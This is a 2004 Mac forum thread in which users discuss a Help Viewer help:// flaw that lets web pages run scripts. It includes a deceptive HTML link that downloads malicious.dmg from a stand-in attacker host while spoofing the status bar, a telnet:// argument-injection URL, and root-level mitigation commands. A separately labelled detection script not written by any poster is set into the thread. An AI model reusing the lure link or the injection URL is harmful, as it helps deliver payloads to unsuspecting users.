Serious Security Flaw in Mac OS X/Safari/Help Viewer (Page 3)
Link
Professional Poster
Join Date: Jun 2003
Location: Hyrule
May 16, 2004, 04:23 PM
 
The difference between apple and microsoft is Microsoft is a valued, and respected company by the masses.
Aloha
     
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 16, 2004, 05:30 PM
 
Originally posted by utidjian:
A totally fabricated scenario deleted.
Yes, it was totally fabricated, and way, way too simplistic. But I was using it to illustrate how it still could have innocently happened EVEN when the Microsoft flaw was known.

You should know by now that I like to use overly simplified (or too extreme) examples to attempt to make a point. I'm probably not very good at it, so I'll stop.

Face it, the engineers at Apple AND the people who manage them screwed up somehow. That "somehow" may never be known.
Yes. They screwed up. We probably never will know how they screwed up. That's not in dispute. The simple fact that the flaw even EXISTS means that they screwed up. That's not my point.

There are people in here who hold Apple to such a high standard that any screw-up is totally unacceptable and that a screw-up of the same magnitude committed by Microsoft is par for the course (and expected of them, to some extent). Well, guess what? The people who work at Apple are [gasp] human! We ALL screw up from time to time. Just like the people who work at Microsoft.

My statement that this flaw is no worse than the equivalent Microsoft flaw is not meant to minimize the importance of the flaw itself. I'm trying to point out the double-standard that has developed here. Microsoft is "expected" to have these problems, by virtue of their historical approach to operating system security. Apple is expected to NEVER have these problems, by virtue of their more "security minded" approach to operating system design. Well guess what? You can be more security-minded when it comes to designing an operating system and more aware of these issues, and you can STILL make mistakes of this magnitude! It doesn't make you any better or worse than anyone else. This incident proves that.

The question is not whether or not Apple has these flaws, but rather how MANY major, serious flaws will be discovered over time. I would expect Apple to have fewer of them OVER TIME, compared with Microsoft.

I was trying to defend Apple a lot more when I thought this was discovered only 2 or 3 days ago. Now that I know that it was reported to them over 2-3 months ago, I have to wonder what is taking them so long to say/do something about it, like everyone else in here.

What is far more interesting, to me, is how they are going to un-screw it... and when.
Yes. I'd like to know how and when, too. Some are submitting the story to Slashdot. Fine. I think each of us should also report this through the proper channels as well. I did, by submitting a link to this thread.

And, historically, Apple has responded better than this to important security flaws. I want to know why they dropped the ball on this one.
( Last edited by Person Man; May 16, 2004 at 05:42 PM. )
     
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 16, 2004, 06:04 PM
 
Originally posted by Person Man:
I think each of us should also report this through the proper channels as well. I did, by submitting a link to this thread.
Oh yeah. Submitting this flaw to CERT and to the other reporting agencies wouldn't hurt either. And it may help the story get picked up by other news outlets.
     
utidjian
Senior User
Join Date: Jan 2001
Location: Mahwah, NJ USA
May 16, 2004, 06:44 PM
 
Originally posted by Person Man:

There are people in here who hold Apple to such a high standard that any screw-up is totally unacceptable and that a screw-up of the same magnitude committed by Microsoft is par for the course (and expected of them, to some extent). Well, guess what? The people who work at Apple are [gasp] human! We ALL screw up from time to time. Just like the people who work at Microsoft.
Sure... people screw up. But Apple, like Microsoft, is a faceless corporation. Apple (the corporation) is the one at fault. As long as we are removed from the developers and maintainers of various parts of Mac OS X, it is Apple's responsibility.


My statement that this flaw is no worse than the equivalent Microsoft flaw is not meant to minimize the importance of the flaw itself. I'm trying to point out the double-standard that has developed here. Microsoft is "expected" to have these problems, by virtue of their historical approach to operating system security. Apple is expected to NEVER have these problems, by virtue of their more "security minded" approach to operating system design. Well guess what? You can be more security-minded when it comes to designing an operating system and more aware of these issues, and you can STILL make mistakes of this magnitude! It doesn't make you any better or worse than anyone else. This incident proves that.
Why do you keep conflating people and corporations?


Yes. I'd like to know how and when, too. Some are submitting the story to Slashdot. Fine. I think each of us should also report this through the proper channels as well. I did, by submitting a link to this thread.

And, historically, Apple has responded better than this to important security flaws. I want to know why they dropped the ball on this one.
It is difficult to tell how Apple has really _responded_ to security flaws because their rules of (non)disclosure make that very difficult to determine. Many, though certainly not all, MS security flaws have been patched well in advance of their becoming known. How many, if any, of Apple's security flaws in Mac OS X have been fixed before they were known, historically?
Historically we will never know why. Apple is a corporation that has a policy of non-disclosure on security issues.

For the sake of us Mac OS X users there needs to be a serious reconsideration of how security issues are reported and dealt with. Relying on submitting notice of flaws to slashdot.org in order to get a response from Apple seems to be... (how to say it?) a bit silly. Seems to me that Apple needs to get in better touch with its security issues and to its users than via slashdot.
-DU-...etc...
     
leraillez
Fresh-Faced Recruit
Join Date: May 2004
Location: Paris
May 16, 2004, 07:16 PM
 
Originally posted by Person Man:

One: a disk image with the malicious code on it. (get the user to download it)
Two: issue a meta-refresh of the page after the image is downloaded (should be able to be accomplished with the right URL)
Three: as part of the refresh of the page, the <help:// ... run script (known path to malicious code on image)> command executes the malicious code on the image).
Just one option I'd like to add: I've had disk images that automatically launched the included installer once they were downloaded. The Apple Developer Documentation gives some information on this subject concerning Internet-enabled disk images, but they only talk about copying the content of the image, not launching the installer.

It does not happen any more on my machine, so I asked a friend to give it a try, and the latest security update downloaded from Apple's web site did launch itself alone once Safari had finished the download and Disk Copy had mounted the image. The only thing is the updater did show a splash screen asking for user OK when automatically launched. This message box never reappeared when the pkg was relaunched afterwards. (It does not work on my machine for an unknown reason; I have to manually launch everything.)

This means there may be a way to automatically launch a trojan via a dmg, since there is the possibility of automatically launching an installer. Could the installer be replaced by any other application?
     
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 16, 2004, 07:37 PM
 
Originally posted by leraillez:
Could the installer be replaced by anyother application?
No, it can't. There is no installer on the disk image; it's an install package that is opened/installed by Apple's installer (in the Utilities folder). And Apple's installer always asks before installation. And explicitly asks again before running scripts in the install package.
It can not be used to execute code without user interaction (afawk).
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
CharlesS
Posting Junkie
Join Date: Dec 2000
May 16, 2004, 08:48 PM
 
Originally posted by Developer:
No, it can't. There is no installer on the disk image; it's an install package that is opened/installed by Apple's installer (in the Utilities folder). And Apple's installer always asks before installation. And explicitly asks again before running scripts in the install package.
It can not be used to execute code without user interaction (afawk).
Unless malicious code is in one of the scripts, and the user clicks "OK" without reading the dialog. I've never liked this auto-launch-packages feature.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
CharlesS
Posting Junkie
Join Date: Dec 2000
May 16, 2004, 09:19 PM
 
sorry, double post
     
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 16, 2004, 10:16 PM
 
Originally posted by utidjian:
Why do you keep conflating people and corporations?
Because corporations don't run themselves. People do.
     
RayX
Dedicated MacNNer
Join Date: Aug 2003
May 17, 2004, 12:00 AM
 
Originally posted by Link:
The difference between apple and microsoft is Microsoft is a valued, and respected company by the masses.
Sarcasm detector *bing* *bing* *bing*
     
leraillez
Fresh-Faced Recruit
Join Date: May 2004
Location: Paris
May 17, 2004, 06:05 AM
 
Originally posted by Developer:

No, it can't. There is no installer on the disk image; it's an install package that is opened/installed by Apple's installer (in the Utilities folder).
Yes I know this but what I meant was: what assures us that only ".pkg" files can be automatically launched when a disk image is mounted and not any other kind of files such as ".app" files/folders!
     
kangoo_boo
Dedicated MacNNer
Join Date: May 2001
Location: Paris, France
May 17, 2004, 07:59 AM
 
If you guys are interested, there's an example of this bug with full demo here:

http://www.insecure.ws/article.php?s...04051612423136
hotline://hl.chatonly.org
mp3://radio.chatonly.org
     
1010011010
Fresh-Faced Recruit
Join Date: May 2004
May 17, 2004, 08:00 AM
 
Originally posted by utidjian:
So there are currently 246 of these little gems on this system.
Run this in terminal to clean them up:

locate OpnApp.scpt | while IFS= read -r i; do mv "$i" "$i.disabled"; done   # one path per line, so paths containing spaces are not split

It will add ".disabled" to the filename of all of the scripts in folders for which you have write access. If you want to rename them all, do this first:

sudo bash

then this from inside that root shell:

locate OpnApp.scpt | while IFS= read -r i; do mv "$i" "$i.disabled"; done   # one path per line, so paths containing spaces are not split
     
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 17, 2004, 09:50 AM
 
Originally posted by 1010011010:
It will add ".disabled" to the filename of all of the scripts in folders for which you have write access.
Why would you want to do this? It will break help files, but will not help to protect you from this vulnerability. Help Viewer executes any script, not just the OpnApp scripts.
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 17, 2004, 02:29 PM
 
Originally posted by theolein:
I decided to submit the story to Slashdot, [...]
Your story is now up on Slashdot.

You should have written that the disk image is mountable via the disk: protocol and that automatic forwarding to disk: and help: can be done with meta refresh tags. The slashdot story doesn't make it obvious how serious the problem is.
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 17, 2004, 02:58 PM
 
Originally posted by Developer:
Your story is now up on Slashdot.

You should have written that the disk image is mountable via the disk: protocol and that automatic forwarding to disk: and help: can be done with meta refresh tags. The slashdot story doesn't make it obvious how serious the problem is.
I did write that. Pudge, the fu*king slashdot editor clown, decided to reject my story and accept a false version from someone else. I posted a correction in that thread.
weird wabbit
     
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 17, 2004, 03:11 PM
 
Originally posted by theolein:
I did write that. Pudge, the fu*king slashdot editor clown, decided to reject my story and accept a false version from someone else. I posted a correction in that thread.
I see. I never read much Slashdot, but if that's the guy who is in charge of the Apple section, I now know why.
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
1010011010
Fresh-Faced Recruit
Join Date: May 2004
May 17, 2004, 04:35 PM
 
Originally posted by Developer:
Why would you want to do this? It will break help files, but will not help to protect you from this vulnerability. Help Viewer executes any script, not just the OpnApp scripts.
Sounds like "help files" are already terminally busted.
     
sniffer
Professional Poster
Join Date: Nov 2000
Location: Norway (I eat whales)
May 17, 2004, 08:14 PM
 
Well, at least the media ball has started rolling. I know enough tabloid sites that'll just repost whatever headlines c|net or /. have, regardless of whether it's correct or wrong, and they really don't give a second to check out sources for details. It's all about achieving a few extra hits with the least effort. Anyhow, the real issue is how Apple is going to act from here. Preferably, we'll have a security update soon, and even better, they will improve their routines in terms of handling security issues and feedback. That said, I appreciate Developer's effort to share his insight on the matter.

Now, all we have to do now is wait...

Sniffer gone old-school sig
     
Diggory Laycock
Professional Poster
Join Date: Oct 2001
Location: London
May 17, 2004, 08:20 PM
 
As has been mentioned before in this thread - the vuln is in the 'Help Viewer' app's handling of URLs of the form: "help://" - you can reduce your exposure by setting your 'help://' protocol helper to anything other than the app 'Help Viewer.'

<pitch>
Setting Chess as the application that deals with the 'help://' protocol seems to deal with the vulnerability until Apple solves it completely.
MoreInternet makes this relatively easy - I'm glad to help. Drag the icon for the Chess app (/Applications/chess.app) to the icon well when "help" is selected as the protocol to change the app helper. (or just choose the app by clicking the 'change' button.)

Good work in spotting this, lixlpixel (and thanks for the bandwidth warning) - we can only hope that Apple solves this problem soon - I believe that they are keen to solve security problems quickly.

You can get MoreInternet by going to the Finder and choosing the "Go" menu -> "iDisk" -> "other user's public folder" and typing DiggoryLaycock into the text field that appears.
</pitch>
( Last edited by Diggory Laycock; May 18, 2004 at 06:37 AM. )
You know it makes sense. ☼ ☼ ☼ Growl.
     
kampl
Dedicated MacNNer
Join Date: Jul 2002
Location: Boston, MA
May 17, 2004, 08:44 PM
 
Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.
     
CharlesS
Posting Junkie
Join Date: Dec 2000
May 17, 2004, 09:21 PM
 
Originally posted by kampl:
Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.
Yeah, only ass-clowns surf the Internet. You know, since you can initiate a JavaScript on one page that does all this just from clicking on a link.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 17, 2004, 09:56 PM
 
Originally posted by kampl:
Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.
This is not the case at all. A malicious site can do all this, with any OSX browser, without you doing ANYTHING at all. You just have to load the page and it's got you. This is in no way similar to the other recent hoaxes or trojans that require the user to do something.
weird wabbit
     
StacyK
Fresh-Faced Recruit
Join Date: May 2004
May 18, 2004, 02:37 AM
 
I'm glad too.

If for some reason you don't want to use MoreInternet, this fix can also be accomplished using the preferences pane in IE 5.2, that is if you are not such an Apple zealot that you deleted that ages ago. Once you set it there the change is good for Safari too.
Originally posted by Diggory Laycock:

MoreInternet makes this relatively easy - I'm glad to help.
     
Mr Scruff
Mac Enthusiast
Join Date: Feb 2001
Location: London, UK
May 18, 2004, 05:42 AM
 
Here's another demo that doesn't involve mounting a .dmg

WARNING: Clicking the below link will cause a non malicious command to be run on your system.

http://bronosky.com/pub/AppleScript.htm

Not good...
     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
May 18, 2004, 05:57 AM
 
No offense to Mr Scruff here, but I strongly advise everybody to look at the HTML source of the files that are linked to in this discussion before they click the link and run real code.

To pros this is certainly obvious, but maybe the less experienced users would just like to see a demo of the exploit and could run into problems if some sucker posts a "demo" link that turns out to be really malicious.

Here's what to do: Download the linked file with a CLI tool like curl or wget (so that it doesn't get executed by any helper app) and then look at the file with a simple text editor like pico, emacs, less or more (so that you see the raw HTML code rather than the rendered HTML). If you don't know what all this means, you would rather not click on any such link at all. Chances are somebody could take advantage of the situation and really screw you.
•
     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
May 18, 2004, 06:10 AM
 
I just reread my post and realized that it doesn't make sense.

The users that know the CLI tools involved probably know enough to not just click on any posted link.

The users who don't know the CLI tools can probably also not judge if the code is just a "good" demo or actually really malicious. I suggest these people should avoid clicking on these links altogether at least if they can't 100% trust the source. Apple.com should post a demo.

But, here's an easy to follow way to check the so-called demo links:
- In Safari right-click on the link and save the linked file to your disk ("Save Linked File As...")
- Open the downloaded file from within a text app that will display the raw text and not the rendered HTML. TextEdit does not work because it renders right away. AppleWorks does work. I don't know about Word since I don't use it.
- Look for a line containing "help:runscript="

If you do not understand what this line does or if you are not 100% sure the line only demonstrates inoffensive things you should never click on the link and run the script.
•
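One way to do Simon's check from the terminal, as an added example that is not from the thread: fetch the page as raw bytes with curl, then grep the saved file for the help:, disk: and telnet: URLs and the meta refresh forwarding this thread describes, without ever opening it in a browser. The function names and the constructed sample page are my own assumptions, not anything posted above.

```shell
#!/bin/sh
# Added example (not from the thread). Assumes only curl, grep, printf, mktemp.

# fetch_raw URL DEST
# Step 1 of the procedure: save the page as bytes only. -L follows HTTP
# redirects; --proto '=http,https' makes curl refuse any other scheme instead
# of handing the URL to anything else.
fetch_raw() {
    curl -sS -L --proto '=http,https' -o "$2" "$1"
}

# scan_saved_html FILE
# Steps 2 and 3: print, with line numbers, every line that references a help:,
# disk: or telnet: URL, or a <meta http-equiv="refresh"> that could forward the
# browser to one. Returns 0 when something was flagged, 1 when the file is
# clean, 2 when FILE does not exist. A flagged refresh line still needs a look
# at its target URL by hand; ordinary pages use meta refresh too.
scan_saved_html() {
    f="$1"
    [ -f "$f" ] || { printf 'no such file: %s\n' "$f" >&2; return 2; }
    # Case-insensitive: browsers and helper-app dispatch match scheme names
    # and attribute values that way, so odd capitalisation is caught as well.
    grep -n -i -E \
        'help:(runscript|//)|disk://|telnet://|http-equiv=["'"'"']?refresh' \
        "$f"
}

# count_flagged FILE
# Number of flagged lines, as a bare integer (0 for a clean or missing file).
count_flagged() {
    scan_saved_html "$1" 2>/dev/null | wc -l | tr -d ' '
}

# demo_scan
# Runs the scanner over a constructed page modelled on the meta refresh plus
# help:runscript= pattern discussed in this thread. The host name is made up
# (.invalid is reserved and never resolves). Returns the scanner's status.
demo_scan() {
    tmp=$(mktemp) || return 2
    printf '%s\n' \
        '<html><head>' \
        '<meta http-equiv="refresh" content="0; url=disk://example.invalid/x.dmg">' \
        '</head><body>' \
        '<a href="help:runscript=/Volumes/x/OpnApp.scpt">Click here</a>' \
        '<a href="http://www.apple.com/">Apple</a>' \
        '</body></html>' > "$tmp"
    scan_saved_html "$tmp"   # flags the refresh line and the help: link only
    rc=$?
    rm -f "$tmp"
    return $rc
}

demo_scan
```

Usage against a real link: `fetch_raw 'http://host/page.htm' page.htm && scan_saved_html page.htm`.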
     
Love Calm Quiet
Mac Elite
Join Date: Mar 2001
Location: CO
May 18, 2004, 06:39 AM
 
I've been reading this thread for days, and no one seems to present an effective argument other than that this is a VERY serious security hole.

Isn't it extremely distressing that Apple hasn't taken any public action, made a statement, issued a warning?

Would someone more knowledgeable among you word what warning(s) seem at present to be most appropriate?

a) "Uncheck 'Open safe files...' " ?

b) "Even after (a), don't click on any hot links on sites you don't trust 100%" ?

[ I'd like to see if there is agreement as to what self-protective steps are needed as of 10.3.3. ]
TOMBSTONE: "He's trashed his last preferences"
     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
May 18, 2004, 06:49 AM
 
Originally posted by Love Calm Quiet:
what warning(s) seem at present to be most appropriate?
Here's my 1-2-3 suggestion:

Step 1) Download More Internet and use it to set Chess.app as the default helper app for the protocol "help" as noted earlier in this thread

Step 2) Send e-mail to Apple and tell them this needs to be fixed ASAP!

Step 3) Be careful. Do not trust everybody. Think before clicking.
P.S. Even if we assume Apple will fix their ridiculous mistake someday, step 3 will always remain valid.
•
     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 18, 2004, 07:58 AM
 
Originally posted by Mr Scruff:
Here's another demo that doesn't involve mounting a .dmg

WARNING: Clicking the below link will cause a non malicious command to be run on your system.

http://bronosky.com/pub/AppleScript.htm

Not good...
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)
JLL

- My opinions may have changed, but not the fact that I am right.
     
Mr Scruff
Mac Enthusiast
Join Date: Feb 2001
Location: London, UK
May 18, 2004, 09:22 AM
 
Originally posted by JLL:
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)
The demo isn't mine, but looking at it again, you're right. The technique given still only allows you to run an arbitrary file (which in this case happens to be a CL tool) but not to specify arguments (since it does the equivalent of double clicking it in the Finder).

I don't think there are any commands that do any damage when run without any arguments.
     
mbryda
Senior User
Join Date: Mar 2002
May 18, 2004, 10:46 AM
 
Originally posted by Link:
The difference between apple and microsoft is Microsoft is a valued, and respected company by the masses.
That's hilarious. M$ not respected by the masses. Every new worm and virus that comes out erodes that perception. If anything, people are starting to look at other options next time it comes time to replace their hardware/software.

Each upgrade is a harder and harder sell for M$. Look at M$'s stock price - it's lower than Apple's. Not much value there.
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 18, 2004, 11:24 AM
 
Originally posted by JLL:
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)
Has this been tried with "%20" URL encoding for spaces or with the "%22" encoding for quotes in case the command and arguments need to be quoted?
weird wabbit
     
[APi]TheMan
Mac Elite
Join Date: Sep 2001
Location: Chico, CA and Carlsbad, CA.
May 18, 2004, 11:57 AM
 
Originally posted by Mr Scruff:
The demo isn't mine, but looking at it again, you're right. The technique given still only allows you to run an arbitrary file (which in this case happens to be a CL tool) but not to specify arguments (since it does the equivalent of double clicking it in the Finder).

I don't think there are any commands that do any damage when run without any arguments.
... but it can point to a script on a disk image with a known path that the hacker had previously (and silently) mounted via the disk:// mechanism. This is scary when you begin to consider the idea mentioned on the above website where unsolicited software could be installed, such as a "Free AOL Trial."

Also, a simple JavaScript could hide the destination URL of a link in some browsers as such:
<a href="disk://server.somehacker.com/malicious.dmg" onMouseOver="window.status='http://www.apple.com/'; return true">Click here to go to Apple's homepage</a>
In my tests I couldn't get Safari to utilize my status bar code, but Camino and Firefox did. One plus is that Camino has an option in preferences to prevent sites from changing the status bar in the Web Features section. Just one more thing to be careful of I suppose. Welcome to the internet, boys and girls.

Also, I set my protocol helper for "help:" to TextEdit, Chess takes too long to open on my mediocre speed G4.
( Last edited by [APi]TheMan; May 18, 2004 at 12:39 PM. )
"In Nomine Patris, Et Fili, Et Spiritus Sancti"

     
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 18, 2004, 11:59 AM
 
What about this:

telnet://-n%2fApplications%2ftestfile

Found in the AppleInsider forums.

Is this a security threat? If so, is it related?
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 18, 2004, 12:38 PM
 
Originally posted by [APi]TheMan:
... but it can point to a script on a disk image with a known path that the hacker had previously (and silently) mounted via the disk:// mechanism.
Yep, but then the method isn't different from the others. The point about the "new" method was that you didn't need to mount an image.
JLL

- My opinions may have changed, but not the fact that I am right.
     
[APi]TheMan
Mac Elite
Join Date: Sep 2001
Location: Chico, CA and Carlsbad, CA.
May 18, 2004, 12:41 PM
 
Originally posted by JLL:
Yep, but then the method isn't different from the others. The point about the "new" method was that you didn't need to mount an image.
Ah-hah, so it is! Duly noted.
"In Nomine Patris, Et Fili, Et Spiritus Sancti"

     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 18, 2004, 12:42 PM
 
Originally posted by theolein:
Has this been tried with "%20" URL encoding for spaces or with the "%22" encoding for quotes in case the command and arguments need to be quoted?
Doesn't work.
JLL

- My opinions may have changed, but not the fact that I am right.
     
CharlesS
Posting Junkie
Join Date: Dec 2000
May 18, 2004, 12:42 PM
 
Originally posted by Developer:
What about this:

telnet://-n%2fApplications%2ftestfile

Found in the AppleInsider forums.

Is this a security threat? If so, is it related?
It's not related, but it could potentially be a problem. It would require a bit of work, though - compromising someone's machine with this would not be effortless like it is with the hole being discussed in this thread.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
Love Calm Quiet
Mac Elite
Join Date: Mar 2001
Location: CO
May 18, 2004, 06:38 PM
 
Despite doing something dumb I (luckily) didn't wipe my home directory:

With MacNN reporting the eWeek story on the OS X vulnerability, I followed the links to Isophonic's "patch". Stupidly I clicked on the first link (thinking it would explain more, and not noticing it was a .dmg):

"Don't Go There, GURLfriend 1.0 18 May 2004
We've just released Don't Go There, GURLfriend! 1.0. DGTGF is an application you can use to patch away the OS X exploit found at http://bronosky.com/pub/AppleScript.htm quickly and effortlessly. Miroku Hotei, Ollie Wagner"

So... it mounts dmg, launches Help and Terminal, and completes the Terminal command.

I have no idea what "patch" was installed -- but it sure was a lesson in how readily my Safari browsing could turn over complete control to unknown scripting (even though I had unchecked "open safe files" upon download in the Safari prefs).

Comments on what other settings I could have changed to prevent the downloading, mounting, and execution of a .dmg?
TOMBSTONE: "He's trashed his last preferences"
     
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 18, 2004, 07:18 PM
 
Originally posted by Love Calm Quiet:
Comments on what other settings I could have changed to prevent the downloading, mounting, and execution of a .dmg?
What I suggest:

Download and run MisFox (a program to change Internet preferences of the OS by the author of iCab):

http://www.clauss-net.de/misfox/misfox.html

Click the Protocol Helpers tab and find the entry for the help: protocol. It will be set to Help Viewer. Change the entry to some other program like Chess. Should you encounter the exploit, Chess will simply run instead of Help Viewer and no scripts will be executed.

When Apple has a fix for the problem, before you install the update run MisFox again and set the help: protocol back to Help Viewer (it's in /System/Library/Core Services/).

I suggest you do not attempt to install any fixes that try to edit the OpnApp scripts or delete the MacHelp.help folder. They do not completely protect from this vulnerability and are not easy to reverse.
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
CharlesS
Posting Junkie
Join Date: Dec 2000
May 18, 2004, 08:24 PM
 
Meh, use More Internet instead of MisFox. It's developed by a member of these boards, and comes in a proper DMG file instead of a SIT.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
catsdorule
Fresh-Faced Recruit
Join Date: Jan 2004
May 18, 2004, 08:27 PM
 
Um, what's with all the complicated fixes, jeez....

OLOLL!! i know! delet erry script on teh comuter!

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.
     
utidjian
Senior User
Join Date: Jan 2001
Location: Mahwah, NJ USA
Status: Offline
Reply With Quote
May 18, 2004, 08:50 PM
 
Originally posted by CharlesS:
Meh, use More Internet instead of MisFox. It's developed by a member of these boards, and comes in a proper DMG file instead of a SIT.
Heh... well, if the link to the download is set up correctly, all one has to do is click on it and it will install itself! *rimshot*

-DU-...etc...
     
kampl
Dedicated MacNNer
Join Date: Jul 2002
Location: Boston, MA
Status: Offline
Reply With Quote
May 18, 2004, 08:56 PM
 
Originally posted by CharlesS:
Yeah, only ass-clowns surf the Internet. You know, since you can initiate a JavaScript on one page that does all this just from clicking on a link.
Then I guess I'm in good company. In any event, I could see this being used for phishing-style attacks and not much else. Similar to vulns for IE not that long ago. Perhaps if a trusted site were infiltrated this would be a problem. Being that it runs in the context of the user, I'm not worrying about it; my system will not be taken out of action by this and anything important is backed up offline. *shrug* Don't really care, a timely fix would be nice though.
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
Status: Offline
Reply With Quote
May 18, 2004, 11:04 PM
 
Originally posted by kampl:
Then I guess I'm in good company. In any event, I could see this being used for phishing-style attacks and not much else. Similar to vulns for IE not that long ago. Perhaps if a trusted site were infiltrated this would be a problem. Being that it runs in the context of the user, I'm not worrying about it; my system will not be taken out of action by this and anything important is backed up offline. *shrug* Don't really care, a timely fix would be nice though.
There are quite a lot of sites, mainly spammers' sites, sites of the type that used to download diallers onto your PC via IE, sites that downloaded spyware onto your PC via IE and porn sites that would love something as easy to implement as this. The site that wants to delete your data is rare, the site that wants to use you for their profit isn't.
weird wabbit
     
Groovy
Mac Enthusiast
Join Date: Apr 2001
Status: Offline
Reply With Quote
May 18, 2004, 11:43 PM
 
Originally posted by catsdorule:
Um, what's with all the complicated fixes, jeez....

OLOLL!! i know! delet erry script on teh comuter!

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.
IMHO that is not the best way because you lose help in apps where you do want it.

IMHO the best way is to DL the "More Internet" system pref and have the help: protocol
point to Chess etc... That stops URL abuse but lets apps already on the Mac access help.

I have tested it and it works well, AND with the "More Internet" system pref you can
do OTHER cool things too, like add a hotline: protocol and have those links
launch that app and connect to a server. (just an example)
     
Spliffdaddy
Posting Junkie
Join Date: Oct 2001
Location: South of the Mason-Dixon line
Status: Offline
Reply With Quote
May 19, 2004, 12:34 AM
 
Did anyone bother to check and see if the 'Chess' app has a security hole?
     
sniffer
Professional Poster
Join Date: Nov 2000
Location: Norway (I eat whales)
Status: Offline
Reply With Quote
May 19, 2004, 02:58 AM
 
Originally posted by catsdorule:

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.
What happens if you run repair permissions with Disk Utility? What happens if you want to read help files?

Sniffer gone old-school sig
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
Status: Offline
Reply With Quote
May 19, 2004, 04:10 AM
 
Originally posted by Spliffdaddy:
Did anyone bother to check and see if the 'Chess' app has a security hole?
That would be the riot of the day, if it turned out that Chess.app had a buffer overflow vulnerability: Queen to A6 -> joo R 0\/\/n3D N00b
weird wabbit
     